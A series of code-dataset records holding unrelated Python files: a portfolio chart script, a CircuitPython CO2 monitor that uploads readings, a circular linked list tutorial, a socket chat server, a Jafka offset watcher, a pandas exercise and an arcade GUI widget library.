self.risk_list[1]:\n r1 = 0.8\n r2 = 0.4\n elif self.user_info[7] == self.risk_list[2]:\n r1 = 0.6\n r2 = 0.3\n elif self.user_info[7] == self.risk_list[3]:\n r1 = 0.4\n r2 = 0.1\n elif self.user_info[7] == self.risk_list[4]:\n r1 = 0.2\n r2 = 0\n\n if self.user_info[1] == self.term_list[0] or self.user_info[1] == self.term_list[1]:\n r2 = 0\n\n real_r0 = int((1 - r1) * 100)\n real_r1 = int((r1 - r2) * 100)\n real_r2 = int(r2 * 100)\n \n \n p_profit = 0 ; p_sigma = 0; p_num = 0; p_ratio = 0;\n for equity in (self.portfolios1, self.portfolios2, self.portfolios3):\n p_num += 1\n if p_num == 1:\n p_ratio = 1-r1\n elif p_num == 2:\n p_ratio = r2\n else:\n p_ratio = r1-r2\n cnt = 0 ; profit = 0; sigma = 0;\n \n for name, info in equity.items():\n cnt += info[0]\n profit += info[1][-2]*info[0]\n sigma += info[1][-1]*info[0]\n if cnt > 0 :\n profit /= cnt; sigma /= cnt;\n \n p_profit += profit * p_ratio \n p_sigma += sigma * p_ratio\n\n 수익률 = round(((1+p_profit/100)**12-1)*100,2)\n 표준편차 = round(p_sigma*100,2)\n\n # 파이 차트 생성\n if r2 == 0:\n ratio = [real_r0, real_r1]\n labels = [\"주식\", \"일반 ETF\"]\n colors = [\"silver\", \"gold\"]\n wedgeprops = {\"width\": 0.7, \"edgecolor\": \"w\", \"linewidth\": 5}\n\n fm.get_fontconfig_fonts()\n font_name = fm.FontProperties(fname=self.fontpath).get_name()\n matplotlib.rc(\"font\", family=font_name)\n\n fig = plt.figure(figsize=(7, 7))\n\n plt.pie(\n ratio,\n labels=labels,\n startangle=90,\n autopct=\"%.0f%%\",\n shadow=True,\n textprops={\"fontsize\": 20},\n colors=colors,\n wedgeprops=wedgeprops,\n )\n if real_r0 == 19:\n plt.legend(labels, fontsize=13, loc=\"lower left\")\n else:\n plt.legend(labels, fontsize=13, loc=\"upper left\")\n plt.savefig(self.path + \"/red/interface/image/portfolio/pie_chart.png\")\n plt.close()\n else:\n ratio = [real_r0, real_r1, real_r2]\n labels = [\"주식\", \"일반 ETF\", \"채권 ETF\"]\n colors = [\"silver\", \"gold\", \"lightgray\"]\n wedgeprops = {\"width\": 0.7, \"edgecolor\": \"w\", \"linewidth\": 5}\n\n fm.get_fontconfig_fonts()\n font_name = fm.FontProperties(fname=self.fontpath).get_name()\n matplotlib.rc(\"font\", family=font_name)\n\n fig = plt.figure(figsize=(7, 7))\n\n plt.pie(\n ratio,\n labels=labels,\n startangle=90,\n autopct=\"%.0f%%\",\n shadow=True,\n textprops={\"fontsize\": 20},\n colors=colors,\n wedgeprops=wedgeprops,\n )\n if real_r0 == 19:\n plt.legend(labels, fontsize=13, loc=\"lower right\")\n else:\n plt.legend(labels, fontsize=13, loc=\"lower left\")\n plt.savefig(self.path + \"/red/interface/image/portfolio/pie_chart.png\")\n plt.close()\n\n # 경로별 이미지 불러오기\n im_tend = Image.open(self.path + \"/red/interface/image/portfolio/red.png\")\n im_chart = Image.open(self.path + \"/red/interface/image/portfolio/pie_chart.png\")\n font = ImageFont.truetype(self.fontpath, 22)\n\n # 칼라 설정\n b, g, r, a = 0, 0, 0, 0\n\n # 이미지에 텍스트 삽입\n draw = ImageDraw.Draw(im_tend)\n draw.text((228, 80.5), \"연 \" + str(수익률) + \"% 내외 추구\", font=font, fill=(b, g, r, a))\n draw.text((228, 244), \"평균 위험률 연 \" + str(표준편차) + \"%\", font=font, fill=(b, g, r, a))\n draw.text((228, 405), \"전체 주식 비중 \" + str(real_r0) + \"% 수준\", font=font, fill=(b, g, r, a))\n\n # 이미지에 파이차트 삽입\n im_tend.paste(im_chart, (510, 10))\n\n display(im_tend)","sub_path":"3. 로보어드바이저/red/red.py","file_name":"red.py","file_ext":"py","file_size_in_byte":37453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141218689","text":"import board\nimport busio\nfrom digitalio import DigitalInOut\nimport adafruit_requests as requests\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\nfrom adafruit_esp32spi import adafruit_esp32spi\nimport json\nimport adafruit_scd30\nimport time\nfrom adafruit_bitmap_font import bitmap_font\nfrom adafruit_display_text import label\n\nscd = adafruit_scd30.SCD30(board.I2C())\n# Get wifi details and more from a secrets.py file\ntry:\n f=open('config.json')\n config=json.load(f)\nexcept:\n print(\"error opening config.json!\")\n\nprint(\"ESP32 SPI webclient test\")\n\nTEXT_URL = \"http://wifitest.adafruit.com/testwifi/index.html\"\nJSON_URL = \"http://api.coindesk.com/v1/bpi/currentprice/USD.json\"\n\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.D10)\nesp32_ready = DigitalInOut(board.D9)\nesp32_reset = DigitalInOut(board.D7)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\nrequests.set_socket(socket, esp)\n\nimport board\nimport displayio\nimport terminalio\nfrom adafruit_display_text import label\nimport adafruit_displayio_ssd1306\n\ndisplayio.release_displays()\n\ni2c = board.I2C()\ndisplay_bus = displayio.I2CDisplay(i2c, device_address=0x3C)\ndisplay = adafruit_displayio_ssd1306.SSD1306(display_bus, width=128, height=64)\n\n#splash = displayio.Group()\n#display.show(splash)\n\n#color_bitmap = displayio.Bitmap(128, 32, 1)\n#color_palette = displayio.Palette(1)\n#color_palette[0] = 0xFFFFFF # White\n\n#bg_sprite = displayio.TileGrid(color_bitmap, pixel_shader=color_palette, x=0, y=0)\n#splash.append(bg_sprite)\n\n# Draw a smaller inner rectangle\n#inner_bitmap = displayio.Bitmap(118, 24, 1)\n#inner_palette = displayio.Palette(1)\n#inner_palette[0] = 0x000000 # Black\n#inner_sprite = displayio.TileGrid(inner_bitmap, pixel_shader=inner_palette, x=5, y=4)\n#splash.append(inner_sprite)\n\n# Draw a label\n\ntext = \"PVOS.ORG\\nCO2 Monitor\\nREV_T\"\ntext_area = label.Label(terminalio.FONT, text=text, color=0xFFFF00, x=20, y=15)\ndisplay.show(text_area)\n\ntime.sleep(3)\n\nexception_count = 0\nsample_recorded_count = 0\n\nwhile True:\n\n if scd.data_available:\n try:\n if (scd.CO2>1):\n # print(\"Data Available!\")\n print(\"CO2: %d PPM\" % scd.CO2)\n\n # print(\"Connecting to AP...\")\n\n text = str(round(scd.CO2))\n #font = bitmap_font.load_font(\"/Helvetica-Bold-16.bdf\")\n\n display.refresh()\n\n #font = bitmap_font.load_font(\"/Junction-regular-24.bdf\")\n #font = bitmap_font.load_font(\"/Helvetica-Bold-16.bdf\")\n font = terminalio.FONT\n color = 0xFFFF00\n text_area = label.Label(font=font, text=text, color=color, x=25, y=25)\n display.show(text_area)\n\n\n #splash.append(text_area)\n\n while not esp.is_connected:\n try:\n esp.connect_AP(config[\"wifi_ssid\"], config[\"wifi_password\"])\n except RuntimeError as e:\n print(\"could not connect to AP, retrying: \", e)\n continue\n # print(\"Connected to\", str(esp.ssid, \"utf-8\"), \"\\tRSSI:\", esp.rssi)\n # print(\"My IP address is\", esp.pretty_ip(esp.ip_address))\n # print(\n # \"IP lookup adafruit.com: %s\" % esp.pretty_ip(esp.get_host_by_name(\"adafruit.com\"))\n # )\n # print(\"Ping google.com: %d ms\" % esp.ping(\"google.com\"))\n\n # esp._debug = True\n\n JSON_POST_URL = \"http://bayou.pvos.org/data/\" + config[\"public_key\"]\n data = {}\n data.update({'private_key':config[\"private_key\"]})\n data.update({'co2_ppm':scd.CO2})\n data.update({'node_id':0})\n data.update({'aux_2': exception_count})\n data.update({'aux_1' : sample_recorded_count})\n print(\"POSTing data to {0}: {1}\".format(JSON_POST_URL, data))\n response = requests.post(JSON_POST_URL, data=data)\n print(\"Response: \", response.text.rstrip())\n # print(\"-\" * 40)\n response.close()\n sample_recorded_count += 1\n # print(\"Done!\")\n time.sleep(1)\n\n text = \"Uploaded\"\n text_area = label.Label(terminalio.FONT, text=text, color=0xFFFF00, x=20, y=15)\n display.show(text_area)\n time.sleep(2)\n\n except Exception as e:\n print(\"*** Exception: \" + str(e))\n exception_count += 1\n # break\n\n\n time.sleep(2)","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"319075029","text":"#LAS LISTAS CIRCULARES FUNCIONAN IGUAL QUE LAS LINKED LIST\n#PERO EN LAS CIRCULARES EN LUGAR DE QUE EL ULTIMO NODO APUNTE A NONE\n#ESTA VEZ APUNTA DE NUEVO A LA RAIZ (ROOT).\n\n#UN NUEVO OBJETO SE DEBE INSERTAR EN LA SEGUNDA POSICION PARA NO ROMPER EL BUCLE.\n#SON IDEALES PARA MODELAR BUCLES CONTINUOS DE OBJETOS (UNA PISTA DE CARRERAS POR EJEMPLO).\n\nclass Node:\n\tdef __init__(self, d, n=None, p=None):\n\t\tself.data = d\n\t\tself.next_node = n\n\t\tself.prev_node = p\n\n\tdef __str__(self):\n\t\treturn ('('+str(self.data)+')')\n\nclass CircularLinkedList:\n\tdef __init__(self, r = None):\n\t\tself.root = r\n\t\tself.size = 0\n\n\tdef add(self, d):\n\t\tif self.size == 0:\n\t\t\tself.root = Node(d)\n\t\t\tself.root.next_node = self.root\n\t\telse:\n\t\t\tnew_node = Node(d, self.root.next_node)\n\t\t\tself.root.next_node = new_node\n\t\tself.size += 1\n\n\tdef find(self, d):\n\t\tthis_node = self.root\n\t\twhile True:\n\t\t\tif this_node.data == d:\n\t\t\t\treturn d\n\t\t\telif this_node.next_node == self.root:\n\t\t\t\treturn False\n\t\t\tthis_node = this_node.next_node\n\n\tdef remove(self, d):\n\t\tthis_node = self.root\n\t\tprev_node = None\n\n\t\twhile True:\n\t\t\tif this_node.data == d: #SE ENCONTRO\n\t\t\t\tif prev_node is not None:\n\t\t\t\t\tprev_node.next_node = this_node.next_node\n\t\t\t\telse:\n\t\t\t\t\twhile this_node.next_node != self.root:\n\t\t\t\t\t\tthis_node = this_node.next_node\n\t\t\t\t\tthis_node.next_node = self.root.next_node\n\t\t\t\t\tself.root = self.root.next_node\n\t\t\t\tself.size -= 1\n\t\t\t\treturn True #SE BORRO\n\t\t\telif this_node.next_node == self.root:\n\t\t\t\treturn False #NO SE ENCONTRO\n\t\t\tprev_node = this_node\n\t\t\tthis_node = this_node.next_node\n\n\tdef print_list(self):\n\t\tif self.root is None:\n\t\t\treturn\n\t\tthis_node = self.root\n\t\tprint(this_node, end='->')\n\t\twhile this_node.next_node != self.root:\n\t\t\tthis_node = this_node.next_node\n\t\t\tprint(this_node, end='->')\n\t\tprint()\n\ncll = CircularLinkedList()\nfor i in [5,7,3,8,9]:\n\tcll.add(i)\n\nprint(\"size= \"+str(cll.size))\nprint(cll.find(8))\nprint(cll.find(12))\n\nmy_node = cll.root\nprint(my_node, end='->')\n\nfor i in range(16): #LA LISTA SE PUEDE REPETIR LAS VECES QUE SE NECESITE.\n\tmy_node = my_node.next_node\n\tprint(my_node, end='->')\nprint()\n\nprint(\"-------------------------\")\n\ncll.print_list()\ncll.remove(8)\nprint(cll.remove(27))\nprint(\"size= \"+str(cll.size))\ncll.remove(5) #BORRA EL ROOT\ncll.print_list()\nprint(\"size= \"+str(cll.size))","sub_path":"data-structures/ds_circular_linkedlist.py","file_name":"ds_circular_linkedlist.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260749827","text":"import socket\nimport threading\n\n# Задание №4\n# СЕРВЕР\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.bind(('', 14900))\nsock.listen(3)\nclients = []\n\n\ndef add_clients():\n while True:\n conn, addr = sock.accept()\n clients.append(conn)\n threading.Thread(target=chat, args=[conn, addr]).start()\n\n\ndef chat(conn, addr):\n print(str(addr))\n while True:\n try:\n a = conn.recv(1024)\n if not a:\n break\n for client in clients:\n if client == conn:\n continue\n client.sendall(a)\n except Exception:\n clients.remove(conn)\n break\n conn.close()\n\n\nthreading.Thread(target=add_clients()).start()\n","sub_path":"students/K33421/Kustova_Ekaterina/Lr1/Task4/cserver.py","file_name":"cserver.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2190515","text":"#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n#Jafka watcher\n#author:imxylz@gmail.com\n#version:0.2\n#date:2012/6/20\n\nimport zookeeper\nimport threading\nimport sys\nimport json\nimport jafka\n\n\ndefault_host=\"10.11.5.145:2181/suc/jafka\"\nZNODE_ACL = [{\"perms\":31,\"scheme\":\"world\",\"id\":\"anyone\"}]\n\ninit_flag = False\nhandle = -1\nconnected = False\n\ndef init_client(host=default_host):\n global init_flag\n global handle\n global connected\n\n if init_flag: return False\n init_flag = True\n\n connected = False\n cond = threading.Condition()\n def connection_watcher(handle,type,stat,path):\n global connected\n with cond:\n connected = True\n cond.notify()\n with cond:\n zookeeper.set_debug_level(2)\n handle = zookeeper.init(host,connection_watcher)\n cond.wait(30.0)\n\n if not connected:\n raise Exception(\"Couldn't connect to host -\",host)\n return True\n\ndef normal_path(path,env=\"\"):\n if env: path = env+path\n if path[-1] == '/':\n path = path[0:-1]\n return path\n\ndef get(path):\n init_client()\n global handle\n try:\n (data,stat) = zookeeper.get(handle,path,None)\n return data\n except zookeeper.NoNodeException:\n return None\n\ndef close():\n global handle\n global init_flag\n global connected\n if not init_flag: return\n zookeeper.close(handle)\n init_flag = False\n connected = False\n\n\ndef exists(path):\n init_client()\n global handle\n try:\n return zookeeper.exists(handle,path) is not None\n except zookeeper.NoNodeException:\n return False\n\ndef get_children(path):\n init_client()\n global handle\n return zookeeper.get_children(handle,path)\n\ndef get_topics():\n return get_children('/brokers/topics')\n\n\ndef main(host=default_host):\n init_client(host)\n topics = get_children('/brokers/topics')\n brokerids = get_children('/brokers/ids')\n brokers = dict((brokerid,get('/brokers/ids/'+brokerid)) for brokerid in brokerids)\n #brokers: brokerid => (host,port)\n brokers = dict((brokerid,(v.split(':')[1],int(v.split(':')[2]))) for brokerid,v in brokers.items())\n\n #topic_broker_parts: topic=>((brokerid,parts),(brokerid,parts)...)\n topic_broker_parts = {}\n for topic in topics:\n topicbrokers = get_children('/brokers/topics/'+topic)\n broker_parts = []\n for b in topicbrokers:\n parts = get('/brokers/topics/'+topic+'/'+b)\n broker_parts.append((int(b),int(parts)))\n topic_broker_parts[topic] = broker_parts\n\n groups = get_children('/consumers')\n\n for group in groups:\n cids = get_children('/consumers/%s/ids'%group)\n ccounts = {}\n for cid in cids:\n topic_counts = get('/consumers/%s/ids/%s'%(group,cid))\n topic_count_map = json.loads(topic_counts)\n ccounts[cid] = topic_count_map\n ctopics = get_children('/consumers/%s/offsets'%group)\n\n #records: [(topic,broker,part,coffset,toffset,consumerid),...]\n records = []\n broker_records = {}\n for ctopic in ctopics:\n cparts = get_children('/consumers/%s/offsets/%s'%(group,ctopic))\n for cpart in cparts:\n coffset = get('/consumers/%s/offsets/%s/%s'%(group,ctopic,cpart))\n consumerid = get('/consumers/%s/owners/%s/%s'%(group,ctopic,cpart))\n consumerid = consumerid if consumerid else '-'\n #print('%15s: %20s %s => %13s'%(group,ctopic,cpart,coffset))\n cbroker,cpartition = cpart.split('-')\n record = [ctopic,cbroker,cpartition,coffset,-1,consumerid]\n ######################\n rds = broker_records.get(cbroker,[])\n if not rds: broker_records[cbroker] = rds\n rds.append(record)\n records.append(record)\n\n for broker,rds in broker_records.items():\n (host,port) = brokers[str(broker)]\n consumer = jafka.Consumer(host,port)\n try:\n for record in rds:\n toffset = consumer.getoffsetsbefore(record[0],int(record[2]),-1,1)[0]\n record[4] = toffset\n finally:\n consumer.close()\n\n title=('groupid','topic','part','consumeoffset','totaloffset','backlog','consumerid')\n wid_sep = list(len(x) for x in title)\n records=sorted(records,key=lambda r:r[0]+r[1]+r[2])\n print_records=[]\n for record in records:\n (ctopic,cbroker,cpartition,coffset,toffset,consumerid) = record\n left = int(toffset) - int(coffset)\n pr = (group,ctopic,cbroker+'-'+cpartition,coffset,toffset,left,consumerid)\n print_records.append(pr)\n wid_sep_num = list(len(str(x)) for x in pr)\n for i in range(len(wid_sep)):\n if wid_sep[i] < wid_sep_num[i]:\n wid_sep[i] = wid_sep_num[i]\n format_sep=' '.join(list('{:>'+str(x)+'}' for x in wid_sep))\n ptitle = format_sep.format(*title)\n print(ptitle)\n print('-'*len(ptitle))\n for pr in print_records:\n print(format_sep.format(*pr))\n print()\n \n\nif __name__ == '__main__':\n print('Jafka watcher v0.2')\n print()\n try:\n main()\n finally:\n close()\n \n\n\n","sub_path":"clients/python/jafka-watcher.py","file_name":"jafka-watcher.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"527491712","text":"# %load q06_sub_total/build.py\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport sys\nimport os\n#sys.path.append(os.path.join(os.path.dirname(os.curdir)))\nfrom greyatomlib.pandas_guided_project.q05_replace_missing_values.build import q05_replace_missing_values\nfrom greyatomlib.pandas_guided_project.q01_load_data.build import q01_load_data\n\npath1 = 'data/excel-comp-data.xlsx'\npath2 = 'data/scraped.csv'\n\ndef q06_sub_total(path1,path2):\n 'write your solution here'\n df_02 = q01_load_data(path1)\n df_02.loc[len(df_02)] = df_02.iloc[:,6:10].sum(axis=0) \n df_02.fillna(value=0, inplace=True, axis=0)\n \n df_03 = pd.read_csv(path2) \n mapping = dict(zip(df_03['United States of America'].str.lower(), df_03['Unnamed: 6']))\n df_02.insert(loc=5, column='abbr', value='')\n df_02.iloc[:,6]=df_02['state'].map(mapping)\n \n df_02.iloc[6,6] = 'MS'\n df_02.iloc[10,6] = 'TN'\n \n #df_02 = q05_replace_missing_values(path1,path2)\n df_sub = df_02.groupby(['postal-code'])[['account', 'Jan', 'Feb', 'Mar']].sum()\n return df_sub\n\npath1 = 'data/excel-comp-data.xlsx'\npath2 = 'data/scraped.csv'\nq06_sub_total(path1, path2)\n\n\n\n","sub_path":"q06_sub_total/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"119594562","text":"from typing import Tuple, Dict, Optional, Union\nimport arcade\n\n\nclass TextButton:\n \"\"\" Text-based button \"\"\"\n def __init__(self,\n center_x, center_y,\n width, height,\n text,\n font_size=18,\n font_face: Union[str, Tuple[str, ...]] = \"Arial\",\n font_color=None,\n face_color=arcade.color.LIGHT_GRAY,\n highlight_color=arcade.color.WHITE,\n shadow_color=arcade.color.GRAY,\n button_height=2,\n theme=None):\n self.center_x = center_x\n self.center_y = center_y\n self.width = width\n self.height = height\n self.text = text\n\n self.pressed = False\n self.active = True\n self.theme = theme\n\n self.press_action = None\n self.release_action = None\n self.click_action = None\n\n self.button_height = button_height\n self.face_color = face_color\n self.highlight_color = highlight_color\n self.shadow_color = shadow_color\n\n if self.theme is not None:\n self.font = self.theme.font\n else:\n self.font = Font(font_face, font_size, font_color)\n\n def get_top(self):\n return self.center_y + self.height / 2\n\n def get_bottom(self):\n return self.center_y - self.height / 2\n\n def get_left(self):\n return self.center_x - self.width / 2\n\n def get_right(self):\n return self.center_x + self.width / 2\n\n def draw_color_theme(self):\n arcade.draw_rectangle_filled(self.center_x, self.center_y, self.width,\n self.height, self.face_color)\n\n if not self.pressed:\n bottom_and_right_color = self.shadow_color\n top_and_left_color = self.highlight_color\n else:\n bottom_and_right_color = self.highlight_color\n top_and_left_color = self.shadow_color\n\n left = self.get_left()\n right = self.get_right()\n top = self.get_top()\n bottom = self.get_bottom()\n\n # draw bottom horizontal line\n arcade.draw_line(left, bottom, right, bottom,\n bottom_and_right_color, self.button_height)\n\n # draw right vertical line\n arcade.draw_line(right, bottom, right, top,\n bottom_and_right_color, self.button_height)\n\n # draw top horizontal line\n arcade.draw_line(left, top, right, top,\n top_and_left_color, self.button_height)\n\n # draw left vertical line\n arcade.draw_line(left, bottom, left, top,\n top_and_left_color, self.button_height)\n\n def draw_texture_theme(self):\n texture_type = \"clicked\" if self.pressed else \"normal\"\n texture = self.theme.button_textures[texture_type]\n\n arcade.draw_texture_rectangle(self.center_x, self.center_y,\n self.width, self.height, texture)\n\n def draw(self):\n \"\"\" Draw the button \"\"\"\n if self.theme:\n self.draw_texture_theme()\n else:\n self.draw_color_theme()\n\n if self.text:\n arcade.draw_text(self.text, self.center_x, self.center_y,\n self.font.color, font_size=self.font.size,\n font_name=self.font.name,\n width=self.width, align=\"center\",\n anchor_x=\"center\", anchor_y=\"center\")\n\n def on_press(self):\n if callable(self.press_action):\n self.press_action()\n\n def on_release(self):\n if callable(self.release_action):\n self.release_action()\n\n def on_click(self):\n if callable(self.click_action):\n self.click_action()\n\n def check_mouse_press(self, x, y):\n if self.check_mouse_collision(x, y):\n self.pressed = True\n self.on_press()\n\n def check_mouse_release(self, x, y):\n if self.pressed:\n self.pressed = False\n\n if self.check_mouse_collision(x, y):\n self.on_release()\n self.on_click()\n\n def check_mouse_collision(self, x, y):\n return (\n self.get_left() <= x <= self.get_right()\n and\n self.get_bottom() <= y <= self.get_top()\n )\n\n\nclass SubmitButton(TextButton):\n \"\"\"\n Deprecated class for create submit button. Use TextButton instead.\n \"\"\"\n def __init__(self, textbox, on_submit, x, y, width=100, height=40, text=\"submit\", theme=None):\n\n from warnings import warn\n warn('SubmitButton has been deprecated. Use TextButton instead.', DeprecationWarning)\n\n super().__init__(x, y, width, height, text, theme=theme)\n self.textbox = textbox\n self.click_action = on_submit\n\n def on_click(self):\n super(SubmitButton, self).on_click()\n self.textbox.text_storage.text = \"\"\n self.textbox.text_display.text = \"\"\n\n\nclass DialogueBox:\n def __init__(self, x, y, width, height, color=None, theme=None):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.color = color\n self.active = False\n self.button_list = []\n self.text_list = []\n self.theme = theme\n if self.theme:\n self.texture = self.theme.dialogue_box_texture\n\n def on_draw(self):\n if self.active:\n if self.theme:\n arcade.draw_texture_rectangle(self.x, self.y, self.width,\n self.height, self.texture)\n else:\n arcade.draw_rectangle_filled(self.x, self.y, self.width,\n self.height, self.color)\n\n for button in self.button_list:\n button.draw()\n\n for text in self.text_list:\n text.draw()\n\n def on_mouse_press(self, x, y, _button, _modifiers):\n for button in self.button_list:\n button.check_mouse_press(x, y)\n\n def on_mouse_release(self, x, y, _button, _modifiers):\n for button in self.button_list:\n button.check_mouse_release(x, y)\n\n\nclass TextLabel:\n def __init__(self, text, x, y, color=arcade.color.BLACK, font_size=22,\n anchor_x=\"center\", anchor_y=\"center\", width: int = 0,\n align=\"center\", font_name=('Calibri', 'Arial'),\n bold: bool = False, italic: bool = False, rotation=0):\n self.text = text\n self.x = x\n self.y = y\n self.color = color\n self.font_size = font_size\n self.anchor_x = anchor_x\n self.anchor_y = anchor_y\n self.width = width\n self.align = align\n self.font_name = font_name\n self.bold = bold\n self.italic = italic\n self.rotation = rotation\n self.active = True\n\n def draw(self):\n arcade.draw_text(self.text, self.x, self.y, self.color,\n font_size=self.font_size,\n anchor_x=self.anchor_x, anchor_y=self.anchor_y,\n width=self.width, align=self.align,\n font_name=self.font_name, bold=self.bold,\n italic=self.italic, rotation=self.rotation)\n\n\nclass TextDisplay:\n def __init__(self, x, y, width=300, height=40, outline_color=arcade.color.BLACK,\n shadow_color=arcade.color.WHITE_SMOKE, highlight_color=arcade.color.WHITE, theme=None):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.outline_color = outline_color\n self.shadow_color = shadow_color\n self.highlight_color = highlight_color\n self.highlighted = False\n self.text = \"\"\n self.left_text = \"\"\n self.right_text = \"\"\n self.symbol = \"|\"\n self.cursor_index = 0\n self.theme = theme\n if self.theme:\n self.texture = self.theme.text_box_texture\n self.font_size = self.theme.font_size\n self.font_color = self.theme.font_color\n self.font_name = self.theme.font_name\n else:\n self.texture = None\n self.font_size = 24\n self.font_color = arcade.color.BLACK\n self.font_name = ('Calibri', 'Arial')\n\n def draw_text(self):\n if self.highlighted:\n arcade.draw_text(self.text[:self.cursor_index] + self.symbol + self.text[self.cursor_index:],\n self.x-self.width/2.1, self.y, self.font_color, font_size=self.font_size,\n anchor_y=\"center\", font_name=self.font_name)\n else:\n arcade.draw_text(self.text, self.x-self.width/2.1, self.y, self.font_color, font_size=self.font_size,\n anchor_y=\"center\", font_name=self.font_name)\n\n def color_theme_draw(self):\n if self.highlighted:\n arcade.draw_rectangle_filled(self.x, self.y, self.width, self.height, self.highlight_color)\n else:\n arcade.draw_rectangle_filled(self.x, self.y, self.width, self.height, self.shadow_color)\n self.draw_text()\n arcade.draw_rectangle_outline(self.x, self.y, self.width, self.height, self.outline_color, 2)\n\n def texture_theme_draw(self):\n arcade.draw_texture_rectangle(self.x, self.y, self.width, self.height, self.texture)\n self.draw_text()\n\n def draw(self):\n if self.texture == \"\":\n self.color_theme_draw()\n else:\n self.texture_theme_draw()\n\n def on_press(self):\n self.highlighted = True\n\n def on_release(self):\n pass\n\n def check_mouse_press(self, x, y):\n if x > self.x + self.width / 2:\n self.highlighted = False\n return\n if x < self.x - self.width / 2:\n self.highlighted = False\n return\n if y > self.y + self.height / 2:\n self.highlighted = False\n return\n if y < self.y - self.height / 2:\n self.highlighted = False\n return\n self.on_press()\n\n def check_mouse_release(self, _x, _y):\n if self.highlighted:\n self.on_release()\n\n def update(self, _delta_time, text, symbol, cursor_index):\n self.text = text\n self.symbol = symbol\n self.cursor_index = cursor_index\n\n\nclass TextStorage:\n def __init__(self, box_width, font_size=24, theme=None):\n self.box_width = box_width\n self.font_size = font_size\n self.theme = theme\n if self.theme:\n self.font_size = self.theme.font_size\n self.char_limit = self.box_width / self.font_size\n self.text = \"\"\n self.cursor_index = 1\n self.cursor_symbol = \"|\"\n self.local_cursor_index = 0\n self.time = 0.0\n self.left_index = 0\n self.right_index = 1\n self.visible_text = \"\"\n\n def blink_cursor(self):\n seconds = self.time % 60\n if seconds > 0.1:\n if self.cursor_symbol == \"_\":\n self.cursor_symbol = \"|\"\n else:\n self.cursor_symbol = \"_\"\n self.time = 0.0\n\n def update(self, delta_time, key):\n self.time += delta_time\n # self.blink_cursor()\n if key:\n if key == arcade.key.BACKSPACE:\n if self.cursor_index < len(self.text):\n text = self.text[:self.cursor_index-1]\n self.text = text + self.text[self.cursor_index:]\n else:\n self.text = self.text[:-1]\n if self.cursor_index > 0:\n self.cursor_index -= 1\n if self.left_index > 0:\n self.left_index -= 1\n if self.right_index > 1:\n self.right_index -= 1\n elif key == arcade.key.LEFT:\n if self.cursor_index > 0:\n self.cursor_index -= 1\n if 0 < self.left_index == self.cursor_index:\n self.left_index -= 1\n self.right_index -= 1\n elif key == arcade.key.RIGHT:\n if self.cursor_index < len(self.text):\n self.cursor_index += 1\n if len(self.text) > self.right_index == self.cursor_index:\n self.right_index += 1\n self.left_index += 1\n else:\n if self.cursor_index < len(self.text):\n self.text = self.text[:self.cursor_index] + chr(key) + self.text[self.cursor_index:]\n self.cursor_index += 1\n self.right_index += 1\n if len(self.text) > self.char_limit:\n self.left_index += 1\n else:\n self.text += chr(key)\n self.cursor_index += 1\n self.right_index += 1\n if len(self.text) >= self.char_limit:\n self.left_index += 1\n self.visible_text = self.text[self.left_index:self.right_index]\n if self.cursor_index > self.left_index:\n self.local_cursor_index = self.cursor_index - self.left_index\n else:\n self.local_cursor_index = self.left_index\n return self.visible_text, self.cursor_symbol, self.local_cursor_index\n\n\nclass TextBox:\n def __init__(self, x, y, width=300, height=40, theme=None, outline_color=arcade.color.BLACK, font_size=24,\n shadow_color=arcade.color.WHITE_SMOKE, highlight_color=arcade.color.WHITE):\n self.theme = theme\n if self.theme:\n self.text_display = TextDisplay(x, y, width, height, theme=self.theme)\n self.text_storage = TextStorage(width, theme=self.theme)\n else:\n self.text_display = TextDisplay(x, y, width, height, outline_color, shadow_color, highlight_color)\n self.text_storage = TextStorage(width, font_size)\n self.text = \"\"\n\n def draw(self):\n self.text_display.draw()\n\n def update(self, delta_time, key):\n if self.text_display.highlighted:\n self.text, symbol, cursor_index = self.text_storage.update(delta_time, key)\n self.text_display.update(delta_time, self.text, symbol, cursor_index)\n\n def check_mouse_press(self, x, y):\n self.text_display.check_mouse_press(x, y)\n\n def check_mouse_release(self, x, y):\n self.text_display.check_mouse_release(x, y)\n\n\nclass Font:\n \"\"\"\n Font settings for draw gui items.\n\n Attributes:\n :name: Font name.\n :size: Font size.\n :color: Font color.\n :bold: True - font is bold\n :italic: True - font is italic\n \"\"\"\n\n DEFAULT_NAME = ('calibri', 'arial')\n DEFAULT_SIZE = 24\n DEFAULT_COLOR = arcade.color.BLACK\n\n def __init__(self, name=None, size=None, color=None,\n bold=False, italic=False):\n \"\"\"\n Create a new font.\n\n :param string | tuple of string name: Font name, or list of font\n names in order of preference\n :param float size: Size of the font\n :param (int, int, int) color: Color of the font\n :param boolean bold: Bold font style\n :param boolean italic: Italic font style\n\n \"\"\"\n self.name = name if name is not None else self.__class__.DEFAULT_NAME\n self.size = size if size is not None else self.__class__.DEFAULT_SIZE\n self.color = color if color is not None else self.__class__.DEFAULT_COLOR\n self.bold = bold\n self.italic = italic\n\n\nclass Theme:\n\n def __init__(self):\n self.button_textures = {'normal': '', 'hover': '', 'clicked': '', 'locked': ''}\n self.menu_texture = \"\"\n self.window_texture = \"\"\n self.dialogue_box_texture = \"\"\n 